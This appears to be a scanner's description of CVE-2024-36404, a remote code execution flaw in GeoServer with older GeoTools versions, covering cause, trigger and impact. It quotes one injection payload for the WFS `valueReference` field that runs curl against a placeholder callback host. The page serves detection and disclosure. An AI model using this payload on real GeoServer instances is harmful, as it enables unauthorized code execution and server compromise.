CVE-2024-36404 Scanner

GeoServer is an open-source server for sharing geospatial data across multiple platforms. It is widely used by GIS professionals for visualizing and editing geospatial data in both desktop and web applications. The server supports various spatial data formats and provides WMS, WFS, and other services to facilitate the sharing of geospatial data. GeoServer is deployed in a wide range of environments from governmental to commercial sectors, and it integrates seamlessly with tools like GeoTools for geospatial analysis. A critical vulnerability exists in GeoServer when used in conjunction with GeoTools versions prior to 31.2, 30.4, and 29.6. This flaw exposes GeoServer to remote code execution risks when certain functionality within GeoTools is exploited.

The vulnerability is a Remote Code Execution (RCE) flaw that arises when GeoServer evaluates XPath expressions supplied by user input. This issue is specifically associated with GeoTools versions prior to 31.2, 30.4, and 29.6. The flaw allows an attacker to execute arbitrary Java code on the server by injecting a malicious payload through specific GeoTools functionality. This can result in severe security risks, including the unauthorized execution of commands or code, which could potentially compromise the integrity of the entire server environment. The vulnerability can be mitigated by updating to the fixed versions or applying workarounds that limit GeoTools functionality. However, older versions without the fix remain vulnerable and should be updated immediately to prevent exploitation.

The vulnerability is triggered when GeoServer, relying on GeoTools for XPath evaluation, processes user-controlled input. This input, which could come from a WFS request, includes a parameter that forces GeoServer to execute arbitrary Java code. The attacker injects a payload into the `wfs:valueReference` field of the WFS request. In particular, an attacker can pass a command like `exec(java.lang.Runtime.getRuntime(),'curl {{interactsh-url}}')` to execute remote code. This vulnerability specifically impacts configurations where GeoServer is paired with vulnerable GeoTools versions and allows attackers to take advantage of unsanitized input handling, triggering RCE.

Exploiting this vulnerability can lead to complete server compromise. An attacker could remotely execute arbitrary code, allowing them to alter server configurations, access sensitive data, or launch further attacks within the network. Malicious actors may exploit this flaw to deploy malware, manipulate geospatial data, or control other systems connected to the compromised GeoServer. Such exploitation can disrupt services, lead to data loss, and pose significant risks to the organization's infrastructure and data integrity. If not patched, the vulnerability could allow an attacker to persistently maintain access, making it a critical security concern.

REFERENCES

• https://nsfocusglobal.com/remote-code-execution-vulnerability-between-geoserver-and-geotools-cve-2024-36401-cve-2024-36404-notification/
• https://nvd.nist.gov/vuln/detail/CVE-2024-36404